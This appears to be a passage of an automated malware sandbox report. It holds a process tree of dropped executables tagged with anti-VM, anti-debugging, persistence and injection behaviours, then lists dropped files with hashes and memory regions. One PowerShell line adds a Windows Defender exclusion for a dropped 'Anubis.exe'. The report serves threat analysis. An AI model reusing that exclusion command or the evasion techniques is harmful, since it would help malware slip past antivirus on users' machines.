                                6⤵
                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                • Checks BIOS information in registry
                                • Executes dropped EXE
                                • Identifies Wine through registry keys
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                • System Location Discovery: System Language Discovery
                                • Suspicious behavior: EnumeratesProcesses
                                PID:3420
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3420 -s 1204
                                  7⤵
                                  • Loads dropped DLL
                                  • Program crash
                                  PID:1944
                              • C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe
                                "C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe"
                                6⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • Suspicious use of SetThreadContext
                                • System Location Discovery: System Language Discovery
                                PID:3800
                                • C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe
                                  "C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe"
                                  7⤵
                                  • Executes dropped EXE
                                  • System Location Discovery: System Language Discovery
                                  PID:896
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 896 -s 1016
                                    8⤵
                                    • Loads dropped DLL
                                    • Program crash
                                    PID:3580
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3800 -s 504
                                  7⤵
                                  • Loads dropped DLL
                                  • Program crash
                                  PID:3892
                              • C:\Users\Admin\AppData\Local\Temp\10107790101\ce4pMzk.exe
                                "C:\Users\Admin\AppData\Local\Temp\10107790101\ce4pMzk.exe"
                                6⤵
                                • Executes dropped EXE
                                • Adds Run key to start application
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:3504
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Local\Caches\ipzvs8T3\Anubis.exe""
                                  7⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  PID:4012
                              • C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe
                                "C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe"
                                6⤵
                                • Executes dropped EXE
                                • Suspicious use of SetThreadContext
                                • System Location Discovery: System Language Discovery
                                PID:4072
                                • C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe
                                  "C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe"
                                  7⤵
                                  • Executes dropped EXE
                                  • System Location Discovery: System Language Discovery
                                  PID:4024
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4072 -s 500
                                  7⤵
                                  • Program crash
                                  PID:3272
                              • C:\Users\Admin\AppData\Local\Temp\10107810101\SvhQA35.exe
                                "C:\Users\Admin\AppData\Local\Temp\10107810101\SvhQA35.exe"
                                6⤵
                                • Executes dropped EXE
                                PID:2212
                                • C:\Users\Admin\AppData\Local\Temp\onefile_2212_133856897364813000\chromium.exe
                                  C:\Users\Admin\AppData\Local\Temp\10107810101\SvhQA35.exe
                                  7⤵
                                  • Executes dropped EXE
                                  PID:3764
                              • C:\Users\Admin\AppData\Local\Temp\10107820101\FvbuInU.exe
                                "C:\Users\Admin\AppData\Local\Temp\10107820101\FvbuInU.exe"
                                6⤵
                                  PID:4092
                      • C:\Windows\system32\taskeng.exe
                        taskeng.exe {8387FC48-1B8B-4A2E-A46B-DAA0AB7AE7B3} S-1-5-21-3063565911-2056067323-3330884624-1000:KHBTHJFA\Admin:Interactive:[1]
                        1⤵
                          PID:1564
                          • C:\ProgramData\sugkcx\gvnsf.exe
                            C:\ProgramData\sugkcx\gvnsf.exe
                            2⤵
                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                            • Checks BIOS information in registry
                            • Executes dropped EXE
                            • Identifies Wine through registry keys
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            • System Location Discovery: System Language Discovery
                            • Suspicious behavior: EnumeratesProcesses
                            PID:2408

                        Network

                        MITRE ATT&CK Enterprise v15

                        Downloads

                        • C:\Temp\GH8RmsOFg.hta
                          Filesize: 779B
                          MD5: 39c8cd50176057af3728802964f92d49
                          SHA1: 68fc10a10997d7ad00142fc0de393fe3500c8017
                          SHA256: f685edf8437c0b505f5e366d8b1cb79e7770361cc4906240e7f8c8ad32c94e84
                          SHA512: cf563b2b5a3553acf3a91298936b904abf87620c2fc582bcdb45dec5d4b877bef5ae81feae4b741e1aee1a916e543b5f6914d9c494d2aa33bc6f15c6fc904cc6

                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
                          Filesize: 71KB
                          MD5: 83142242e97b8953c386f988aa694e4a
                          SHA1: 833ed12fc15b356136dcdd27c61a50f59c5c7d50
                          SHA256: d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755
                          SHA512: bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\IAE3FJ0M\soft[1]
                          Filesize: 987KB
                          MD5: f49d1aaae28b92052e997480c504aa3b
                          SHA1: a422f6403847405cee6068f3394bb151d8591fb5
                          SHA256: 81e31780a5f2078284b011c720261797eb8dd85e1b95a657dbce7ac31e9df1f0
                          SHA512: 41f715eea031fd8d7d3a22d88e0199277db2f86be73f830819288c0f0665e81a314be6d356fdc66069cb3f2abf0dd02aaa49ac3732f3f44a533fcec0dfd6f773

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\K3VL8XEP\service[1].htm
                          Filesize: 1B
                          MD5: cfcd208495d565ef66e7dff9f98764da
                          SHA1: b6589fc6ab0dc82cf12099d1c2d40ab994e8410c
                          SHA256: 5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9
                          SHA512: 31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

                        • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bhg31lui.default-release\activity-stream.discovery_stream.json.tmp
                          Filesize: 23KB
                          MD5: e532ed9d9b666bc6827ad24488568157
                          SHA1: b34c35ba2b99c5e0eed8df9f8854db3a4825def4
                          SHA256: 8307aed41502e0ae7d75fddcdcbc1d4547027d19b399d9f2121eac4819c21a85
                          SHA512: e83fd72d66d1cd2eb8e2e3e1919b8814979c073c1076827c95fc8307ea34f91f8c30208d572bd9eeb4f3ef2d888eea8f7d5101bc02ff09800bfd5bba2ab73e12

                        • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bhg31lui.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl
                          Filesize: 15KB
                          MD5: 96c542dec016d9ec1ecc4dddfcbaac66
                          SHA1: 6199f7648bb744efa58acf7b96fee85d938389e4
                          SHA256: 7f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798
                          SHA512: cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658

                        • C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe
                          Filesize: 457KB
                          MD5: 73636685f823d103c54b30bc457c7f0d
                          SHA1: 597dba03dce00cf6d30b082c80c8f9108ae90ccf
                          SHA256: 1edc123e5a8ea5ce814e2759ee38453404d4af72a3577b0af55e8d99fa38ef1c
                          SHA512: 183d4901a72afc044ef13c3a2cc21f93aefd954665f981c7886afc9019ca7d46f76b3459789dff5721542f2f9e7bbf606d7df68328e772e4c66dc789964f43f7

                        • C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe
                          Filesize: 38KB
                          MD5: 47177b7fbf1ce282fb87da80fd264b3f
                          SHA1: d07d2f9624404fa882eb94ee108f222d76bbbd4c
                          SHA256: e3a190fc0f3e2be612c896ad1bda174271ee57d493f1b39030de1cbb5b7090eb
                          SHA512: 059db11d303355b85e94031a54b0e6bac30bc9e2475bf3fceb9c01063af6f593d455fb54f8893ca37a150b598a9863b04f37056ef589656a6e83da719b330db9

                        • C:\Users\Admin\AppData\Local\Temp\10107440101\cd0ae9eb0c.exe
                          Filesize: 938KB
                          MD5: 83cd4a3ac24bea5dd2388d852288c7de
                          SHA1: 059245d06571b62c82b059a16b046793f6753dbc
                          SHA256: a8bc81ff72efd02a4edf01f87d1f108886d80a2484a91e776a4e947b3f47bad1
                          SHA512: 5133d4638db05e87daaba1b5725ddaaddb434440e31a2241732dfcc21d3f8c03212f715171d990f0fd601eb926a8a0308b93f5d8139c697399a06e891725c31c

                        • C:\Users\Admin\AppData\Local\Temp\10107450121\am_no.cmd
                          Filesize: 1KB
                          MD5: cedac8d9ac1fbd8d4cfc76ebe20d37f9
                          SHA1: b0db8b540841091f32a91fd8b7abcd81d9632802
                          SHA256: 5e951726842c371240a6af79d8da7170180f256df94eac5966c07f04ef4d120b
                          SHA512: ce383ffef8c3c04983e752b7f201b5df2289af057e819cdf7310a55a295790935a70e6a0784a6fd1d6898564a3babab1ffcfbaa0cc0d36e5e042adeb3c293fa5

                        • C:\Users\Admin\AppData\Local\Temp\10107670101\cd4e8b5947.exe
                          Filesize: 3.8MB
                          MD5: 6afaf17077308fa040a656dc9e7d15ed
                          SHA1: df7caf0b424dc62a60dfb64f585c111448c0c1e3
                          SHA256: 42c07ef38b42451a7b1717dff97266f615f2e5cedab1c5c5827dbe3e6d9f69b0
                          SHA512: cd459aa3bc462822a61a9f3e943aef48e9e332661c562c39bd92388be1544f034afef9f5f02315b5bce5419564ed4f3fb94e76efcb4422fdd7775aeb011be986

                        • C:\Users\Admin\AppData\Local\Temp\10107680101\9cab6ad180.exe
                          Filesize: 445KB
                          MD5: c83ea72877981be2d651f27b0b56efec
                          SHA1: 8d79c3cd3d04165b5cd5c43d6f628359940709a7
                          SHA256: 13783c2615668fba4a503cbefdc18f8bc3d10d311d8dfe12f8f89868ed520482
                          SHA512: d212c563fdce1092d6d29e03928f142807c465ecaaead4fe9d8949b6f36184b8d067a830361559d59fc00d3bbe88feda03d67b549d54f0ec268e9e75698c1dd0

                        • C:\Users\Admin\AppData\Local\Temp\10107690101\cb98fa6f53.exe
                          Filesize: 4.5MB
                          MD5: 5d153f73ce1b6a907cf87ddb04ba12b2
                          SHA1: bfda9ee8501ae0ca60f8e1803efea482085bf699
                          SHA256: 2af376f6a5d706982e3ac08f54d737c4c203bdc2c2c1cbf5f9fc9d4a3a775b2c
                          SHA512: 0f6ef7ff7db227bec5d2a1dcef461313cde66b5ec38f5efd377e533ef15d87eb4aef6cf387ee7c7b63d1142a883bb18577f97dec0dcd818b93891e87f499c102

                        • C:\Users\Admin\AppData\Local\Temp\10107700101\c77bb98cda.exe
                          Filesize: 1.8MB
                          MD5: 8538c195a09066478922511ea1a02edf
                          SHA1: 15e8910df845d897b4bb163caef4c6112570855b
                          SHA256: d5008972ddedb199731712f9fef3b3aa5a5cd666b600136a9da84656739d4e96
                          SHA512: 60b2c66006b226140f7bf50c94c65088081b311ee92c6dea376a1349ff2380e0ce053a84b2df3be8a54bf7f7bb76f1add8417f4f1bf2fb0681e008cbd5b1725c

                        • C:\Users\Admin\AppData\Local\Temp\10107710101\51a7d2c853.exe
                          Filesize: 3.1MB
                          MD5: 2a48e7b047c5ff096c6dce52d4f26dbb
                          SHA1: e0d61e10b27131b1c34ade44d1a2117afd2cf099
                          SHA256: 42642893c6a6af226aab5b2cce0875e7affebf7d1001146ddd90234d4c01492d
                          SHA512: 75965d3aa7cda41ecc11f87b1ac2b12283d58650f5b96f2af560aff859ca74c0c0cb26dfc765b4d8318291d8f89fdbb338fb71ddf3f4b63389aedb5e2106165a

                        • C:\Users\Admin\AppData\Local\Temp\10107720101\65ac27f01e.exe
                          Filesize: 1.7MB
                          MD5: 338a31056b3b81d48a292a7bf9af67c7
                          SHA1: f5061e3583ba604b25e316f12fc58f40238d44b4
                          SHA256: cd1c085a07dc81e4305c2b9ee57e5c0433858c97cb20b1743cf44931c431ccea
                          SHA512: 5bc7823cbd1ab6fa963df8f152d8b6de56af41159f3a736d147f1e5b4dcba3007319e2d2fb13e97f1e8b3cce3ab0d17e31d541be1ab53f8bd05a42316a940abc

                        • C:\Users\Admin\AppData\Local\Temp\10107730101\ef30a65d57.exe
                          Filesize: 946KB
                          MD5: c0caf5a901b162b6792eab9697827b5d
                          SHA1: d078ba4ad104c40bf5f2c8afda1cbdf4afc55a84
                          SHA256: 28c182baea1726c3e851405b13f130e02817099758abab86ca9cdc3607b9f89f
                          SHA512: 3fba4eb7a2bc21fc24a6e29495e598efc5f208db030b13de8af43a392a93e3a920e4e8e4b68e10d4dc4a0e8779401ca738172ca9cba2ddc2246854c41a8a58a5

                        • C:\Users\Admin\AppData\Local\Temp\10107740101\e6410dd2f6.exe
                          Filesize: 1.7MB
                          MD5: 8043b20e32ff2f0c75e9a3eed0c4bf07
                          SHA1: 5464aa1bc2a91c64cd8c4cbbb6970e8189c158a3
                          SHA256: 69a487512dfb97f08d068d0f9dd3924f42bef46bddd79112cb206b00fc16713e
                          SHA512: 35639c6aad3dd25f606ca72ad108f774b083fa62677772242d357d59add9bba1dc85532d58ae67277d90c04dd4a5189548ca331fe93ee086c31cacbf11b8a18c

                        • C:\Users\Admin\AppData\Local\Temp\10107750101\zY9sqWs.exe
                          Filesize: 361KB
                          MD5: 2bb133c52b30e2b6b3608fdc5e7d7a22
                          SHA1: fcb19512b31d9ece1bbe637fe18f8caf257f0a00
                          SHA256: b8e02f2bc0ffb42e8cf28e37a26d8d825f639079bf6d948f8debab6440ee5630
                          SHA512: 73229885f8bf4aace4671b819a8487f36acb7878cd309bdf80b998b0a63584f3063364d192b1fc26fa71b9664908fe290a00f6898350c30f40d5f2a2d2efe51f

                        • C:\Users\Admin\AppData\Local\Temp\10107760101\PcAIvJ0.exe
                          Filesize: 120KB
                          MD5: 5b3ed060facb9d57d8d0539084686870
                          SHA1: 9cae8c44e44605d02902c29519ea4700b4906c76
                          SHA256: 7c711ab33a034ed733b18b76a0154c56065c74a9481cbd0e4f65aa2b03c8a207
                          SHA512: 6733ae1c74c759031fb2de99beb938f94fc77ed8cc3b42b2b1d24a597f9e74eeab5289f801407619485f81fccaa55546344773e9a71b40b1af6b3c767b69e71a

                        • C:\Users\Admin\AppData\Local\Temp\10107770101\v6Oqdnc.exe
                          Filesize: 2.0MB
                          MD5: 6006ae409307acc35ca6d0926b0f8685
                          SHA1: abd6c5a44730270ae9f2fce698c0f5d2594eac2f
                          SHA256: a5fa1579a8c1a1d4e89221619d037b6f8275f34546ed44a020f5dfcee3710f0b
                          SHA512: b2c47b02c972f63915e2e45bb83814c7706b392f55ad6144edb354c7ee309768a38528af7fa7aeadb5b05638c0fd55faa734212d3a657cd08b7500838135e718

                        • C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe
                          Filesize: 415KB
                          MD5: 641525fe17d5e9d483988eff400ad129
                          SHA1: 8104fa08cfcc9066df3d16bfa1ebe119668c9097
                          SHA256: 7a87b801af709e8e510140f0f9523057793e7883ec2b6a4eab90fcf0ec20fd4a
                          SHA512: ee92bc34e21bb68aeda20b237e8b8e27f95e4cc44f5fd9743b52079c40f193cc342f8bb2690fd7ab3624e1690979118bd2e00a46bda3052cbd76bc379b87407e

                        • C:\Users\Admin\AppData\Local\Temp\10107790101\ce4pMzk.exe
                          Filesize: 48KB
                          MD5: d39df45e0030e02f7e5035386244a523
                          SHA1: 9ae72545a0b6004cdab34f56031dc1c8aa146cc9
                          SHA256: df468fc510aec82c827987f54b824b978dd71301f93d18d71e704727d6dfdfa2
                          SHA512: 69866ba5b53d1183a0899e3d22ff06111ae2e8df429beeb853c89f3ed0afb015dd4139b1c507566ffb0fe171a4ff1b318247b7a568dc492d9f71266f5c848a64

                        • C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe
                          Filesize: 350KB
                          MD5: b60779fb424958088a559fdfd6f535c2
                          SHA1: bcea427b20d2f55c6372772668c1d6818c7328c9
                          SHA256: 098c4fe0de1df5b46cf4c825e8eba1893138c751968fcf9fe009a6991e9b1221
                          SHA512: c17a7781790326579669c2b9ad6f7f9764cf51f44ad11642d268b077ade186563ae53fc5e6e84eb7f563021db00bef9ebd65a8d3fbe7a73e85f70a4caa7d8a7f

                        • C:\Users\Admin\AppData\Local\Temp\10107810101\SvhQA35.exe
                          Filesize: 11.5MB
                          MD5: 9da08b49cdcc4a84b4a722d1006c2af8
                          SHA1: 7b5af0630b89bd2a19ae32aea30343330ca3a9eb
                          SHA256: 215a9d61105d1ada2b22fbf70e58745cabfff72b93d95aae1ce20bbc6defa6dd
                          SHA512: 579dcb0c2f0af9a97a9c75caf023f375bd93f1698678393e7315360a33f432f2d727bf14b22c8b1584c628582115462bdd0c3edaacdcaec8fd691595e6b5bfdb

                        • C:\Users\Admin\AppData\Local\Temp\10107820101\FvbuInU.exe
                          Filesize: 1.8MB
                          MD5: f155a51c9042254e5e3d7734cd1c3ab0
                          SHA1: 9d6da9f8155b47bdba186be81fb5e9f3fae00ccf
                          SHA256: 560c7869df511c5ea54f20be704bbda02e1623d0867333a90ac3783d29eae7af
                          SHA512: 67ec5546d96e83a3c6f4197a50812f585b96b4f34a2b8d77503b51cddd4ea5a65d5416c3efc427a5e58119fa068125987e336efb2dfd5811fe59145aa5f5bd6a

                        • C:\Users\Admin\AppData\Local\Temp\Bjuo1Ytnk.hta
                          Filesize: 717B
                          MD5: fc9b37b45ee22ac3220b9e280bfa4cd4
                          SHA1: d005ba15e722aeb452630ebe8274457a978672a6
                          SHA256: d592c1b0ad7641e0b504272de671e47fe302e95b7ac79787d0e682f306142cb6
                          SHA512: 5c5a0466fcdda320464ede65bb8ad1e245f64a699242d7bb74dd949673bed836d426a53af9c6cb121a49bcad39bba7050536456b5655d191acbce2ee76367bfb

                        • C:\Users\Admin\AppData\Local\Temp\TarF455.tmp
                          Filesize: 183KB
                          MD5: 109cab5505f5e065b63d01361467a83b
                          SHA1: 4ed78955b9272a9ed689b51bf2bf4a86a25e53fc
                          SHA256: ea6b7f51e85835c09259d9475a7d246c3e764ad67c449673f9dc97172c351673
                          SHA512: 753a6da5d6889dd52f40208e37f2b8c185805ef81148682b269fff5aa84a46d710fe0ebfe05bce625da2e801e1c26745998a41266fa36bf47bc088a224d730cc

                        • C:\Users\Admin\AppData\Local\Temp\eFSASVJL1.hta
                          Filesize: 717B
                          MD5: 214ecd61b6d16ec0d47c54fc8f1d874c
                          SHA1: 2ba8788b961a887b4578b7c3173b68de4ceeb285
                          SHA256: 0e4d41f19004b61605bc2b6bf11ff24272dfdb792c8090a63445dd0fa52cc42c
                          SHA512: e14107749af4af7a0e3919a942b6c423a64b6de1fa554f69dea904d2352513dc06b50e889bbaeeaf6becaa9a4226150ce8de26b1c0a6181b0c1f67c1c7b40fb8

                        • C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe
                          Filesize: 1.6MB
                          MD5: 1dc908064451d5d79018241cea28bc2f
                          SHA1: f0d9a7d23603e9dd3974ab15400f5ad3938d657a
                          SHA256: d521f17349128cc6339aecb7a5e41f91ab02d338e5c722cd809d96c3a1c64454
                          SHA512: 6f072459376181f7ddb211cf615731289706e7d90b7c81e306c6cd5c79311544d0b4be946791ae4fad3c2c034901bc0a2fd5b2a710844e3fe928a92d1cc0814f

                        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\B4440P9RCO6GVIR8HWV3.temp
                          Filesize: 7KB
                          MD5: e14a3a6130eea99fc9d4dab7bc2f8585
                          SHA1: 13c5150d1a5b53a0a8fc5f66889f1ff2d051b998
                          SHA256: d5c25e590f6d950b06baedbddb412bb6c510d79c31d7b782c92b7b8efff938aa
                          SHA512: 29e4e0d9766be0ffa5787ff89cef5dfc1fd926f762ac194af5689ec1ea35a730a392aa8031aff8c2e666a9be6647413853d3bae71513ed19d2ffd6e95245c9ff

                        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                          Filesize: 7KB
                          MD5: 2557dc784d8bed899da42bf62724cd5c
                          SHA1: babf2ab1dd7624cad65b47f6bec76b8254b80c78
                          SHA256: f6d665e11a22e2e9b5682f69f3612659f4e72211aea2545d47f1183a6f6e8400
                          SHA512: a82b6aea76599ee61099d94babea87005f4e748a3ca673d795257689375194a2c8f3ca644f705d9a7271906b4a7cde438fa65abb25917541db447ee9331a31a9

                        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                          Filesize: 7KB
                          MD5: 5dc4cb488b998e7f96799fd8a4aade27
                          SHA1: aac3f7d78191710e2e85e80241e478b87a2e94dc
                          SHA256: b5d8b4da36ddf0e01681abbe6084ed4b2a5d6a08f91c1985d2fe728c0ad19ef0
                          SHA512: bc965ab8ee90252237c1e5fbcc45f3ba9c750035e1657326d0f9ef8b379e12bbaac6dcfd51cc7269e12cfd2c3ae5d1128edfa398b68902582dbdcc7e9db8945f

                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhg31lui.default-release\datareporting\glean\db\data.safe.bin
                          Filesize: 2KB
                          MD5: 26216b4696bea895c77f97ec8b2a34b7
                          SHA1: 6e6ff86cf5fa96b879f6903f3c8d439ca045ed51
                          SHA256: f8a19700888258aa1614eb7ee793f3e8e1ef5dd384cc6c5712e79c29075be16f
                          SHA512: 61c19fd8ad715efdd4b73c2287cfa9dc2de45d478707db86afcbf0cf88d9f1fc5a5aabdf267bfed24babef55813c912d26a688adbe68402b1c70786f4f2e7e87

                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhg31lui.default-release\datareporting\glean\pending_pings\5ec7a57a-29aa-4f0d-b37b-c846b96d1281

                          Filesize

                          745B

                          MD5

                          275afce8f8bd93608b272b906aeebdf7

                          SHA1

                          e223d02e3f98621bf4d7b9299420f5abed3f5468

                          SHA256

                          2afd0138376f9c4fd55a80295e1b8aa428325d3532f9eabec21735f589be7cb5

                          SHA512

                          21aabeec972952c7098ed76943558bc27c80664e3c6a7ad2d885878477dc72e89674c260f517ba552b0730cf47edad4e6c86575241f0cfe825e70f1cd51248a7

                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhg31lui.default-release\datareporting\glean\pending_pings\c518fcca-1407-49d2-acce-963862a8da65

                          Filesize

                          12KB

                          MD5

                          968d571b2774dcc7a20b3ac02a1d0e34

                          SHA1

                          fca77952eae22f5ad0a2add88ca78fcdf77e0988

                          SHA256

                          b4d0d50aca4e94b5f12185d800f5189accf01bd4a97f598b79c6ff6678a1a046

                          SHA512

                          b69fbc7f651257ddac083b2b5fc342d245bc92378bd9bdaf75cb8b33c84cb57c30234dce5505da96ba92b2f52c9fd182649f91b1b2b846d1a4f0e2032e4f7275

                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhg31lui.default-release\prefs-1.js

                          Filesize

                          6KB

                          MD5

                          ec2d52962eeec7c1d536013b9b3e4399

                          SHA1

                          89dde681ca7fcd89e856b3403c27252b06a13f54

                          SHA256

                          776b553b4a2416d7994741b9231bafe346456203eab25d2ac318199b805f8015

                          SHA512

                          6608fd089b0067ef4c61c1ed5323f4cce4b72f538d4f965ab020ee030f2a801d58dc313791714ea1b9f14358b1bac541dc0911247461ca89e7a9fa46feebf00b

                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhg31lui.default-release\prefs.js

                          Filesize

                          6KB

                          MD5

                          3224541ee499b1f30ea80393ab279d34

                          SHA1

                          a29eec2b9a9737651011649a620f51f89cdab692

                          SHA256

                          044e793993eeff6f292c87a71fde6453c9b13647b7c34c6015ed8f59d902b9c1

                          SHA512

                          f40bc72c0e85d50646f598fd027a8ee9cf624003d885b242d483abc45672234fcea180fced567bf76648c16d6ae488ff8a740aef4c8c0c0ca24555ec74c4fe07

                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhg31lui.default-release\prefs.js

                          Filesize

                          6KB

                          MD5

                          42a55ffa2ffbc63efcb06872e64786f3

                          SHA1

                          5cdee127d3bfd6d9f3548cc2c31e7b4f7a96587e

                          SHA256

                          579816094a6f2e79199c4b58a949b030a88273364115d6e6a888ad09e6194412

                          SHA512

                          ab48b0830c379040e1e847e9f7e31062850ac97a9760a0dfc3c7edd4688f7124c335f10572a58d789f46e263baefb6b593b0274da32d2b23dd95e2dce2110eea

                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhg31lui.default-release\sessionstore-backups\recovery.jsonlz4

                          Filesize

                          4KB

                          MD5

                          705d4552cb12e4353a7856d4e055653f

                          SHA1

                          db37fa7b6e9183bcb9ddb35ab77aa308f504aac0

                          SHA256

                          44eb8180c62f9c60d2bc76d32fec4e93de8e4b1c11d26cdcdb68f9429e308374

                          SHA512

                          01effe006b306f0d6d456cc268cc3bf3c35761e6e4e5e3487e348e450f3aed78cf17e840e756c09accac4c923bd97186521fc081a1162b75d4669ddbfc90ca45

                        • C:\Windows\Tasks\Test Task17.job

                          Filesize

                          218B

                          MD5

                          dc66cb3280e093e23914366564673875

                          SHA1

                          2a737c4f5a73c37f2768a432d53e0de190fc6292

                          SHA256

                          c0f7a76f80ed92e1aaeabcf1355be95d5f8e6e0064a1b96f6be3d7df978f259b

                          SHA512

                          3e58e3c1cf14dd3c1be6a69b6379edb2a8e8aa678bd29cc3e7776b97f8fb876d4cc8f72bb6e68a7246b79697bf5c91e0f765ad628f172c40dd8f18f37fd365af

                        • \Users\Admin\AppData\Local\TempOYDYK0OQRLM5YDLB8DCEE9MFD5X2FUUS.EXE

                          Filesize

                          1.8MB

                          MD5

                          b5db83c03a37b4cd4746a6080133e338

                          SHA1

                          edf3f7e5c3bda89e1382df8f7d0443783426c834

                          SHA256

                          8bf5d7ea5c499425488b94f13497a5c3b02997f00ec88fad1b577736fab245df

                          SHA512

                          e99da7c87f01dc7459b57d0ce3df799aeb22738840f047c56fb319dc8edddc00ae303ca02916b4b09690df3ff14d559fac44b3e627c6b24498338cfa290fc313

                        • memory/600-147-0x0000000000400000-0x0000000000840000-memory.dmp

                          Filesize

                          4.2MB

                        • memory/600-297-0x0000000000400000-0x0000000000840000-memory.dmp

                          Filesize

                          4.2MB

                        • memory/600-177-0x0000000000400000-0x0000000000840000-memory.dmp

                          Filesize

                          4.2MB

                        • memory/600-396-0x0000000000400000-0x0000000000840000-memory.dmp

                          Filesize

                          4.2MB

                        • memory/600-425-0x0000000000400000-0x0000000000840000-memory.dmp

                          Filesize

                          4.2MB

                        • memory/600-87-0x0000000000400000-0x0000000000840000-memory.dmp

                          Filesize

                          4.2MB

                        • memory/600-260-0x0000000000400000-0x0000000000840000-memory.dmp

                          Filesize

                          4.2MB

                        • memory/600-210-0x0000000000400000-0x0000000000840000-memory.dmp

                          Filesize

                          4.2MB

                        • memory/896-709-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/896-712-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/896-721-0x0000000000400000-0x0000000000466000-memory.dmp

                          Filesize

                          408KB

                        • memory/900-189-0x0000000000E80000-0x000000000133F000-memory.dmp

                          Filesize

                          4.7MB

                        • memory/900-188-0x0000000000E80000-0x000000000133F000-memory.dmp

                          Filesize

                          4.7MB

                        • memory/1420-262-0x0000000010000000-0x000000001001C000-memory.dmp

                          Filesize

                          112KB

                        • memory/1420-254-0x0000000000400000-0x000000000042F000-memory.dmp

                          Filesize

                          188KB

                        • memory/1420-257-0x0000000000400000-0x000000000042F000-memory.dmp

                          Filesize

                          188KB

                        • memory/1516-133-0x0000000006520000-0x00000000069DF000-memory.dmp

                          Filesize

                          4.7MB

                        • memory/1532-224-0x0000000000D00000-0x0000000000D78000-memory.dmp

                          Filesize

                          480KB

                        • memory/1572-302-0x0000000000400000-0x000000000042F000-memory.dmp

                          Filesize

                          188KB

                        • memory/1688-231-0x0000000000400000-0x0000000000465000-memory.dmp

                          Filesize

                          404KB

                        • memory/1688-229-0x0000000000400000-0x0000000000465000-memory.dmp

                          Filesize

                          404KB

                        • memory/1688-233-0x0000000000400000-0x0000000000465000-memory.dmp

                          Filesize

                          404KB

                        • memory/1688-237-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

                          Filesize

                          4KB

                        • memory/1688-238-0x0000000000400000-0x0000000000465000-memory.dmp

                          Filesize

                          404KB

                        • memory/1688-240-0x0000000000400000-0x0000000000465000-memory.dmp

                          Filesize

                          404KB

                        • memory/1688-227-0x0000000000400000-0x0000000000465000-memory.dmp

                          Filesize

                          404KB

                        • memory/1688-235-0x0000000000400000-0x0000000000465000-memory.dmp

                          Filesize

                          404KB

                        • memory/1780-376-0x00000000008E0000-0x0000000000D8B000-memory.dmp

                          Filesize

                          4.7MB

                        • memory/2108-206-0x0000000006BC0000-0x00000000075CD000-memory.dmp

                          Filesize

                          10.1MB

                        • memory/2108-30-0x0000000000DA0000-0x000000000125F000-memory.dmp

                          Filesize

                          4.7MB

                        • memory/2108-201-0x0000000000DA0000-0x000000000125F000-memory.dmp

                          Filesize

